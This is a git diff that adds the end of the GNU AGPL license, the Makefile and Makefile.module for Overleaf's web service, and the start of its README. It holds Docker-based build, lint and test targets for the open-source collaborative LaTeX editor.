should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. 
diff --git a/services/web/Makefile b/services/web/Makefile new file mode 100644 index 0000000..c691604 --- /dev/null +++ b/services/web/Makefile @@ -0,0 +1,571 @@ +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = web +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') +PWD = $(shell pwd) + +export OVERLEAF_CONFIG ?= /overleaf/services/web/test/acceptance/config/settings.test.saas.js +export BASE_CONFIG ?= ${OVERLEAF_CONFIG} + +CFG_SAAS=/overleaf/services/web/test/acceptance/config/settings.test.saas.js +CFG_SERVER_CE=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js +CFG_SERVER_PRO=/overleaf/services/web/test/acceptance/config/settings.test.server-pro.js + +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +MODULE_DIRS := $(shell find modules -mindepth 1 -maxdepth 1 -type d -not -name '.git' ) +MODULE_MAKEFILES := $(MODULE_DIRS:=/Makefile) +MODULE_NAME=$(shell basename $(MODULE)) + +$(MODULE_MAKEFILES): Makefile.module + cp Makefile.module $@ || diff Makefile.module $@ + +# +# Clean +# + +clean: + -$(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_parallel_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=unit_test_parallel_make_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_saas_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_server_ce_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_test_server_pro_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_1_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_2_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_3_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_saas_4_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_server_ce_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=acceptance_modules_merged_server_pro_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=test_frontend_ct_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + -COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down --rmi local + +clean_ci: + $(DOCKER_COMPOSE) down -v -t 0 + docker container list | grep 'days ago' | cut -d ' ' -f 1 - | xargs -r docker container stop + docker image prune -af --filter "until=48h" + docker network prune -f + +# +# Tests +# + +test: test_unit test_acceptance test_frontend test_frontend_ct + +test_module: test_unit_module test_acceptance_module + +# +# Unit tests +# + +test_unit: test_unit_all +test_unit_all: export COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) +test_unit_all: + $(DOCKER_COMPOSE) run --rm test_unit npm run test:unit:all + $(DOCKER_COMPOSE) down -v -t 0 + 
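+# Illustrative usage, not a new target: MOCHA_GREP is forwarded into the test
+# container by the $(DOCKER_COMPOSE) invocation above, so a subset of the unit
+# tests can be selected, e.g.
+#   make test_unit MOCHA_GREP='AuthorizationManager'
+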
+test_unit_all_silent: export COMPOSE_PROJECT_NAME=unit_test_all_$(BUILD_DIR_NAME) +test_unit_all_silent: + $(DOCKER_COMPOSE) run --rm test_unit npm run test:unit:all:silent + $(DOCKER_COMPOSE) down -v -t 0 + +test_unit_app: export COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME) +test_unit_app: + $(DOCKER_COMPOSE) run --name unit_test_$(BUILD_DIR_NAME) --rm test_unit + $(DOCKER_COMPOSE) down -v -t 0 + +TEST_SUITES = $(sort $(filter-out \ + $(wildcard test/unit/src/helpers/*), \ + $(wildcard test/unit/src/*/*))) + +MOCHA_CMD_LINE = \ + mocha \ + --exit \ + --file test/unit/bootstrap.js \ + --grep=${MOCHA_GREP} \ + --reporter spec \ + --timeout 25000 \ + +.PHONY: $(TEST_SUITES) +$(TEST_SUITES): + $(MOCHA_CMD_LINE) $@ + +J ?= 1 +test_unit_app_parallel_gnu_make: $(TEST_SUITES) +test_unit_app_parallel_gnu_make_docker: export COMPOSE_PROJECT_NAME = \ + unit_test_parallel_make_$(BUILD_DIR_NAME) +test_unit_app_parallel_gnu_make_docker: + $(DOCKER_COMPOSE) run --rm test_unit \ + make test_unit_app_parallel_gnu_make --output-sync -j $(J) + $(DOCKER_COMPOSE) down -v -t 0 + +TEST_UNIT_MODULES = $(MODULE_DIRS:=/test_unit) +$(TEST_UNIT_MODULES): %/test_unit: %/Makefile +test_unit_modules: $(TEST_UNIT_MODULES) + +test_unit_module: + $(MAKE) modules/$(MODULE_NAME)/test_unit + + +# +# Frontend tests +# + +test_frontend: + COMPOSE_PROJECT_NAME=frontend_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run --rm test_frontend + COMPOSE_PROJECT_NAME=frontend_test_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0 + +# +# Frontend component tests in Cypress +# +# Local development: use $ make test_frontend_ct +# +TEST_FRONTEND_CT_VARIANTS = \ + test_frontend_ct \ + test_frontend_ct_core_other \ + test_frontend_ct_core_features \ + test_frontend_ct_modules \ + test_frontend_ct_editor_other \ + test_frontend_ct_editor_visual \ + +# Note: The below cypress targets are for CI only +build_test_frontend_ct: + docker run --rm --volume /dev/shm:/dev/shm --user root $(IMAGE_CI) bash -ec 'tar -cC / overleaf | tar -xC /dev/shm' + +test_frontend_ct_core_other: export CYPRESS_RESULTS=./cypress/results/core +test_frontend_ct_core_other: export CYPRESS_SPEC_PATTERN=./test/frontend/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_core_other: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_core_features: export CYPRESS_RESULTS=./cypress/results/core +test_frontend_ct_core_features: export CYPRESS_SPEC_PATTERN=./test/frontend/features/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_core_features: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/source-editor/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_modules: export CYPRESS_RESULTS=./cypress/results/modules +test_frontend_ct_modules: export CYPRESS_SPEC_PATTERN=./modules/**/test/frontend/**/*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_editor_other: export CYPRESS_RESULTS=./cypress/results/editor_other +test_frontend_ct_editor_other: export CYPRESS_SPEC_PATTERN=./test/frontend/features/source-editor/**/*.spec.{js,jsx,ts,tsx} +test_frontend_ct_editor_other: export CYPRESS_EXCLUDE_SPEC_PATTERN=./test/frontend/features/source-editor/components/codemirror-editor-visual*.spec.{js,jsx,ts,tsx} + +test_frontend_ct_editor_visual: export CYPRESS_RESULTS=./cypress/results/editor_visual +test_frontend_ct_editor_visual: export CYPRESS_SPEC_PATTERN=./test/frontend/features/source-editor/components/codemirror-editor-visual*.spec.{js,jsx,ts,tsx} + +$(TEST_FRONTEND_CT_VARIANTS): + COMPOSE_PROJECT_NAME=$@_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run 
--rm test_frontend_ct
+	COMPOSE_PROJECT_NAME=$@_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0
+
+#
+# Acceptance tests
+#
+
+test_acceptance: test_acceptance_app test_acceptance_modules
+test_acceptance_saas: test_acceptance_app_saas test_acceptance_modules_merged_saas
+test_acceptance_server_ce: test_acceptance_app_server_ce test_acceptance_modules_merged_server_ce
+test_acceptance_server_pro: test_acceptance_app_server_pro test_acceptance_modules_merged_server_pro
+
+TEST_ACCEPTANCE_APP := \
+	test_acceptance_app_saas \
+	test_acceptance_app_server_ce \
+	test_acceptance_app_server_pro \
+
+test_acceptance_app: $(TEST_ACCEPTANCE_APP)
+test_acceptance_app_saas: export COMPOSE_PROJECT_NAME=acceptance_test_saas_$(BUILD_DIR_NAME)
+test_acceptance_app_saas: export OVERLEAF_CONFIG=$(CFG_SAAS)
+test_acceptance_app_server_ce: export COMPOSE_PROJECT_NAME=acceptance_test_server_ce_$(BUILD_DIR_NAME)
+test_acceptance_app_server_ce: export OVERLEAF_CONFIG=$(CFG_SERVER_CE)
+test_acceptance_app_server_pro: export COMPOSE_PROJECT_NAME=acceptance_test_server_pro_$(BUILD_DIR_NAME)
+test_acceptance_app_server_pro: export OVERLEAF_CONFIG=$(CFG_SERVER_PRO)
+
+$(TEST_ACCEPTANCE_APP):
+	$(DOCKER_COMPOSE) run --rm test_acceptance
+	$(DOCKER_COMPOSE) down -v -t 0
+
+# We are using _make magic_ for turning these file-targets into calls to
+# sub-Makefiles in the individual modules.
+# These sub-Makefiles need to be kept in sync with the template, hence we
+# add a dependency on each module's Makefile and cross-link that to the
+# template at the very top of this file.
+# Example: `web$ make modules/server-ce-scripts/test_acceptance_server_ce`
+# Description: Run the acceptance tests of the server-ce-scripts module in an
+# Overleaf Community Edition environment.
+# Breakdown:
+# Target: modules/server-ce-scripts/test_acceptance_server_ce
+#  -> depends on modules/server-ce-scripts/Makefile
+#  -> adds the environment variable BASE_CONFIG=$(CFG_SERVER_CE)
+#  -> BASE_CONFIG=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js
+#  -> automatic target: `make -C server-ce-scripts test_acceptance_server_ce`
+#  -> automatic target: run `make test_acceptance_server_ce` in the module
+# Target: modules/server-ce-scripts/Makefile
+#  -> depends on Makefile.module
+#  -> automatic target: copies the file when changed
+TEST_ACCEPTANCE_MODULES = $(MODULE_DIRS:=/test_acceptance)
+$(TEST_ACCEPTANCE_MODULES): %/test_acceptance: %/Makefile
+$(TEST_ACCEPTANCE_MODULES): modules/%/test_acceptance:
+	$(MAKE) test_acceptance_module MODULE_NAME=$*
+
+TEST_ACCEPTANCE_MODULES_SAAS = $(MODULE_DIRS:=/test_acceptance_saas)
+$(TEST_ACCEPTANCE_MODULES_SAAS): %/test_acceptance_saas: %/Makefile
+$(TEST_ACCEPTANCE_MODULES_SAAS): export BASE_CONFIG = $(CFG_SAAS)
+
+# This line adds the `/test_acceptance_server_ce` suffix to all items in $(MODULE_DIRS).
+TEST_ACCEPTANCE_MODULES_SERVER_CE = $(MODULE_DIRS:=/test_acceptance_server_ce)
+# This line adds a dependency on the module's Makefile.
+$(TEST_ACCEPTANCE_MODULES_SERVER_CE): %/test_acceptance_server_ce: %/Makefile
+# This line adds the environment variable BASE_CONFIG=$(CFG_SERVER_CE) to all
+# invocations of `web$ make modules/foo/test_acceptance_server_ce`.
+$(TEST_ACCEPTANCE_MODULES_SERVER_CE): export BASE_CONFIG = $(CFG_SERVER_CE)
+
+TEST_ACCEPTANCE_MODULES_SERVER_PRO = $(MODULE_DIRS:=/test_acceptance_server_pro)
+$(TEST_ACCEPTANCE_MODULES_SERVER_PRO): %/test_acceptance_server_pro: %/Makefile
+$(TEST_ACCEPTANCE_MODULES_SERVER_PRO): export BASE_CONFIG = $(CFG_SERVER_PRO)
+
+CLEAN_TEST_ACCEPTANCE_MODULES = $(MODULE_DIRS:=/clean_test_acceptance)
+$(CLEAN_TEST_ACCEPTANCE_MODULES): %/clean_test_acceptance: %/Makefile
+clean_test_acceptance_modules: $(CLEAN_TEST_ACCEPTANCE_MODULES)
+clean_ci: clean_test_acceptance_modules
+
+test_acceptance_module_noop:
+	@echo
+	@echo Module '$(MODULE_NAME)' does not run in ${LABEL}.
+	@echo
+
+TEST_ACCEPTANCE_MODULE_MAYBE_IN := \
+	test_acceptance_module_maybe_in_saas \
+	test_acceptance_module_maybe_in_server_ce \
+	test_acceptance_module_maybe_in_server_pro \
+
+test_acceptance_module: $(TEST_ACCEPTANCE_MODULE_MAYBE_IN)
+test_acceptance_module_maybe_in_saas: export BASE_CONFIG=$(CFG_SAAS)
+test_acceptance_module_maybe_in_server_ce: export BASE_CONFIG=$(CFG_SERVER_CE)
+test_acceptance_module_maybe_in_server_pro: export BASE_CONFIG=$(CFG_SERVER_PRO)
+
+# We need to figure out whether the module is loaded in a given environment.
+# This information is stored in the (base-)settings.
+# We get the full list of modules and check for a matching module entry.
+# Either grep finds and emits the module, or it exits with code 1, which
+# we handle with a fallback to a noop make target.
+# Run the node command in a docker compose container which provides the needed
+# npm dependencies (from disk in dev-env or from the CI image in CI).
+# Pick the test_unit service, which is very lightweight -- the test_acceptance
+# service would start mongo/redis.
+$(TEST_ACCEPTANCE_MODULE_MAYBE_IN): test_acceptance_module_maybe_in_%:
+	$(MAKE) $(shell \
+		OVERLEAF_CONFIG=$(BASE_CONFIG) \
+		$(DOCKER_COMPOSE) run --rm test_unit \
+		node test/acceptance/getModuleTargets test_acceptance_$* \
+		| grep -e /$(MODULE_NAME)/ || echo test_acceptance_module_noop LABEL=$* \
+	)
+
+# See the docs for test_acceptance_server_ce for how this works.
+test_acceptance_module_saas: export BASE_CONFIG = $(CFG_SAAS)
+test_acceptance_module_saas:
+	$(MAKE) modules/$(MODULE_NAME)/test_acceptance_saas
+
+test_acceptance_module_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE)
+test_acceptance_module_server_ce:
+	$(MAKE) modules/$(MODULE_NAME)/test_acceptance_server_ce
+
+test_acceptance_module_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO)
+test_acceptance_module_server_pro:
+	$(MAKE) modules/$(MODULE_NAME)/test_acceptance_server_pro
+
+# See the docs for test_acceptance_server_ce for how this works.
+TEST_ACCEPTANCE_MODULES_MERGED_INNER = $(MODULE_DIRS:=/test_acceptance_merged_inner)
+$(TEST_ACCEPTANCE_MODULES_MERGED_INNER): %/test_acceptance_merged_inner: %/Makefile
+test_acceptance_modules_merged_inner:
+	$(MAKE) $(shell \
+		OVERLEAF_CONFIG=$(BASE_CONFIG) \
+		node test/acceptance/getModuleTargets test_acceptance_merged_inner \
+	)
+
+# inner loop for running saas tests in parallel
+no_more_targets:
+
+# If we ever have more than 40 modules, we need to add _5 targets to all the places and have it START at 41.
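+# Illustrative arithmetic, assuming e.g. 25 modules: batch 1 covers entries
+# 1-10, batch 2 covers 11-20, batch 3 covers 21-25, and batch 4 finds nothing
+# and falls back to the no_more_targets target above.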
+test_acceptance_modules_merged_inner_1: export START=1
+test_acceptance_modules_merged_inner_2: export START=11
+test_acceptance_modules_merged_inner_3: export START=21
+test_acceptance_modules_merged_inner_4: export START=31
+TEST_ACCEPTANCE_MODULES_MERGED_INNER_SPLIT = \
+	test_acceptance_modules_merged_inner_1 \
+	test_acceptance_modules_merged_inner_2 \
+	test_acceptance_modules_merged_inner_3 \
+	test_acceptance_modules_merged_inner_4 \
+
+# The node script prints one module per line.
+# Using tail we skip over the first START-1 entries, then head prints the next
+# 10 entries of that batch.
+# Finally we check with grep for any targets in the batch and print a fallback
+# if none were found.
+$(TEST_ACCEPTANCE_MODULES_MERGED_INNER_SPLIT):
+	$(MAKE) $(shell \
+		OVERLEAF_CONFIG=$(BASE_CONFIG) \
+		node test/acceptance/getModuleTargets test_acceptance_merged_inner \
+		| tail -n+$(START) | head -n 10 \
+		| grep -e . || echo no_more_targets \
+	)
+
+# See the docs for test_acceptance_server_ce for how this works.
+test_acceptance_modules_merged_saas: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_saas_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_saas: export BASE_CONFIG = $(CFG_SAAS)
+
+test_acceptance_modules_merged_server_ce: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_server_ce_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE)
+
+test_acceptance_modules_merged_server_pro: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_server_pro_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO)
+
+# All these variants run the same command.
+# Each target has a different set of environment variables defined above.
+TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS = \
+	test_acceptance_modules_merged_saas \
+	test_acceptance_modules_merged_server_ce \
+	test_acceptance_modules_merged_server_pro \
+
+$(TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS):
+	$(DOCKER_COMPOSE) run --rm test_acceptance make test_acceptance_modules_merged_inner
+	$(DOCKER_COMPOSE) down -v -t 0
+
+# outer loop for running saas tests in parallel
+TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS = \
+	test_acceptance_modules_merged_saas_1 \
+	test_acceptance_modules_merged_saas_2 \
+	test_acceptance_modules_merged_saas_3 \
+	test_acceptance_modules_merged_saas_4 \
+
+test_acceptance_modules_merged_saas_1: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_saas_1_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_saas_2: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_saas_2_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_saas_3: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_saas_3_$(BUILD_DIR_NAME)
+test_acceptance_modules_merged_saas_4: export COMPOSE_PROJECT_NAME = \
+	acceptance_test_modules_merged_saas_4_$(BUILD_DIR_NAME)
+$(TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS): export BASE_CONFIG = $(CFG_SAAS)
+
+$(TEST_ACCEPTANCE_MODULES_MERGED_SPLIT_SAAS): test_acceptance_modules_merged_saas_%:
+	$(DOCKER_COMPOSE) run --rm test_acceptance make test_acceptance_modules_merged_inner_$*
+	$(DOCKER_COMPOSE) down -v -t 0
+
+test_acceptance_modules: $(TEST_ACCEPTANCE_MODULES_MERGED_VARIANTS)
+
+#
+# CI tests
+#
+
+ci:
+	MOCHA_ARGS="--reporter tap" \
+	$(MAKE) test
+
+#
+# Lint & format
+#
+ORG_PATH = /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+RUN_LINT_FORMAT ?= \
+	docker run --rm ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER)
+
+NODE_MODULES_PATH := 
${PATH}:${PWD}/node_modules/.bin:/overleaf/services/web/node_modules/.bin +WITH_NODE_MODULES_PATH = \ + format_backend \ + format_frontend \ + format_misc \ + format_styles \ + format_test_app_unit \ + format_test_app_rest \ + format_test_modules \ + $(TEST_SUITES) \ + +$(WITH_NODE_MODULES_PATH): export PATH=$(NODE_MODULES_PATH) + +lint: lint_eslint +lint_eslint: + npm run lint + +lint: lint_stylelint +lint_stylelint: + npm run lint:styles + +lint: lint_pug +lint_pug: + bin/lint_pug_templates + +lint: lint_locales +lint_locales: + bin/lint_locales + +lint: check_extracted_translations +check_extracted_translations: + bin/check_extracted_translations + +sort_locales: + node scripts/translations/sort.js + +cleanup_unused_locales: + node scripts/translations/cleanupUnusedLocales.js + +lint: lint_flag_res_send_usage +lint_flag_res_send_usage: + bin/lint_flag_res_send_usage + +lint: lint_overleafModuleImports +lint_overleafModuleImports: + node scripts/check_overleafModuleImports.mjs + +lint: typecheck_frontend +typecheck_frontend: + npm run --silent type-check + +lint: typecheck_backend +typecheck_backend: + npm run --silent type-check:backend + +lint_in_docker: + $(RUN_LINT_FORMAT) make lint -j2 --output-sync + +format: format_js +format_js: + npm run --silent format + +format: format_styles +format_styles: + npm run --silent format:styles + +format_fix: + npm run --silent format:fix + +format_styles_fix: + npm run --silent format:styles:fix + +format_in_docker: + $(RUN_LINT_FORMAT) make format -j2 --output-sync + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(PWD):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(PWD):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +# +# Build & publish +# + +IMAGE_CI ?= ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) +IMAGE_REPO ?= us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME) +IMAGE_REPO_BRANCH ?= $(IMAGE_REPO):$(BRANCH_NAME) +IMAGE_REPO_MAIN ?= $(IMAGE_REPO):main +IMAGE_REPO_FINAL ?= $(IMAGE_REPO_BRANCH)-$(BUILD_NUMBER) + +export SENTRY_RELEASE ?= ${COMMIT_SHA} + +build_deps: + docker build --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --cache-from $(IMAGE_REPO_BRANCH)-deps \ + --cache-from $(IMAGE_REPO_MAIN)-deps \ + --tag $(IMAGE_REPO_BRANCH)-deps \ + --target deps \ + --file Dockerfile \ + ../.. + +build_dev: + docker build \ + --build-arg SENTRY_RELEASE \ + --tag $(IMAGE_CI) \ + --tag $(IMAGE_CI)-dev \ + --target dev \ + --file Dockerfile \ + ../.. + +build_webpack: + $(MAKE) build_webpack_once \ + || $(MAKE) build_webpack_once + +build_webpack_once: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-dev \ + --cache-from $(IMAGE_CI)-webpack \ + --tag $(IMAGE_CI)-webpack \ + --target webpack \ + --file Dockerfile \ + ../.. + +build_pug: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-dev \ + --tag $(IMAGE_CI)-pug \ + --target pug \ + --file Dockerfile \ + ../.. 
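+
+# Illustrative sequence, not an official pipeline: the build targets above map
+# onto the Dockerfile stages (deps -> dev -> webpack / pug -> app), so a full
+# local image build is roughly:
+#   make build_deps build_dev build_webpack build_pug build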
+ +build: + docker build \ + --build-arg SENTRY_RELEASE \ + --cache-from $(IMAGE_CI)-webpack \ + --cache-from $(IMAGE_CI)-pug \ + --cache-from $(IMAGE_REPO_FINAL) \ + --tag $(IMAGE_REPO_FINAL) \ + --target app \ + --file Dockerfile \ + ../.. + +publish: + docker push $(IMAGE_REPO_FINAL) + +tar: + COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) run --rm tar + COMPOSE_PROJECT_NAME=tar_$(BUILD_DIR_NAME) $(DOCKER_COMPOSE) down -v -t 0 + +build_storybook: + npm run lezer-latex:generate + npm run build-storybook + if [ -n "$(BRANCH_NAME)" ]; then \ + echo "Renaming storybook-static -> $(BRANCH_NAME)."; \ + d=$$(dirname "$(BRANCH_NAME)"); \ + mkdir -p "storybook-output/$$d"; \ + mv storybook-static "storybook-output/$$d/$$(basename "$(BRANCH_NAME)")/"; \ + fi + +MODULE_TARGETS = \ + $(TEST_ACCEPTANCE_MODULES_SAAS) \ + $(TEST_ACCEPTANCE_MODULES_SERVER_CE) \ + $(TEST_ACCEPTANCE_MODULES_SERVER_PRO) \ + $(TEST_ACCEPTANCE_MODULES_MERGED_INNER) \ + $(CLEAN_TEST_ACCEPTANCE_MODULES) \ + $(TEST_UNIT_MODULES) \ + +$(MODULE_TARGETS): + $(MAKE) -C $(dir $@) $(notdir $@) BUILD_DIR_NAME=$(BUILD_DIR_NAME) + +.PHONY: + $(MODULE_TARGETS) \ + compile_modules compile_modules_full clean_ci \ + test test_module test_unit test_unit_app \ + test_unit_modules test_unit_module test_frontend \ + test_acceptance test_acceptance_app test_acceptance_modules \ + test_acceptance_module ci format format_fix lint \ + shellcheck shellcheck_fix \ + build publish tar diff --git a/services/web/Makefile.module b/services/web/Makefile.module new file mode 100644 index 0000000..6e1ce32 --- /dev/null +++ b/services/web/Makefile.module @@ -0,0 +1,66 @@ +BUILD_DIR_NAME ?= web +MODULE_NAME := $(notdir $(shell pwd)) +MODULE_DIR := modules/$(MODULE_NAME) +PROJECT_NAME = web + +export OVERLEAF_CONFIG = /overleaf/services/web/$(MODULE_DIR)/test/acceptance/config/settings.test.js +export BASE_CONFIG ?= /overleaf/services/web/test/acceptance/config/settings.test.saas.js + +CFG_SAAS=/overleaf/services/web/test/acceptance/config/settings.test.saas.js +CFG_SERVER_CE=/overleaf/services/web/test/acceptance/config/settings.test.server-ce.js +CFG_SERVER_PRO=/overleaf/services/web/test/acceptance/config/settings.test.server-pro.js + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := cd ../../ && \ + MODULE_DIR=$(MODULE_DIR) \ + BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +ifeq (,$(wildcard test/unit)) +test_unit: + +else +test_unit: export COMPOSE_PROJECT_NAME=unit_test_$(BUILD_DIR_NAME)_$(MODULE_NAME) +test_unit: + ${DOCKER_COMPOSE} run --rm test_unit npm -q run test:unit:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/unit/src + ${DOCKER_COMPOSE} down + +endif + +ALL_TEST_ACCEPTANCE_VARIANTS := \ + test_acceptance \ + test_acceptance_saas \ + test_acceptance_server_ce \ + test_acceptance_server_pro \ + +ifeq (,$(wildcard test/acceptance)) +$(ALL_TEST_ACCEPTANCE_VARIANTS) test_acceptance_merged_inner: + @echo + @echo Module $(MODULE_NAME) does not have acceptance tests. 
+	@echo
+
+clean_test_acceptance:
+
+else
+test_acceptance_saas: export BASE_CONFIG = $(CFG_SAAS)
+test_acceptance_server_ce: export BASE_CONFIG = $(CFG_SERVER_CE)
+test_acceptance_server_pro: export BASE_CONFIG = $(CFG_SERVER_PRO)
+
+$(ALL_TEST_ACCEPTANCE_VARIANTS): export COMPOSE_PROJECT_NAME=acceptance_test_$(BUILD_DIR_NAME)_$(MODULE_NAME)
+$(ALL_TEST_ACCEPTANCE_VARIANTS):
+	$(MAKE) --no-print-directory clean_test_acceptance
+	${DOCKER_COMPOSE} run --rm test_acceptance npm -q run test:acceptance:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/acceptance/src
+	$(MAKE) --no-print-directory clean_test_acceptance
+
+test_acceptance_merged_inner:
+	cd ../../ && \
+	npm -q run test:acceptance:run_dir -- ${MOCHA_ARGS} $(MODULE_DIR)/test/acceptance/src
+
+clean_test_acceptance: export COMPOSE_PROJECT_NAME=acceptance_test_$(BUILD_DIR_NAME)_$(MODULE_NAME)
+clean_test_acceptance:
+	${DOCKER_COMPOSE} down -v -t 0
+
+endif
diff --git a/services/web/README.md b/services/web/README.md
new file mode 100644
index 0000000..f82a55d
--- /dev/null
+++ b/services/web/README.md
@@ -0,0 +1,130 @@
+overleaf/web
+==============
+
+overleaf/web is the front-end web service of the open-source web-based collaborative LaTeX editor,
+[Overleaf](https://www.overleaf.com).
+It serves all the HTML pages, CSS and JavaScript to the client. overleaf/web also contains
+much of the logic for creating and editing projects, and for account management.
+
+
+The rest of the Overleaf stack, along with information about contributing, can be found in the
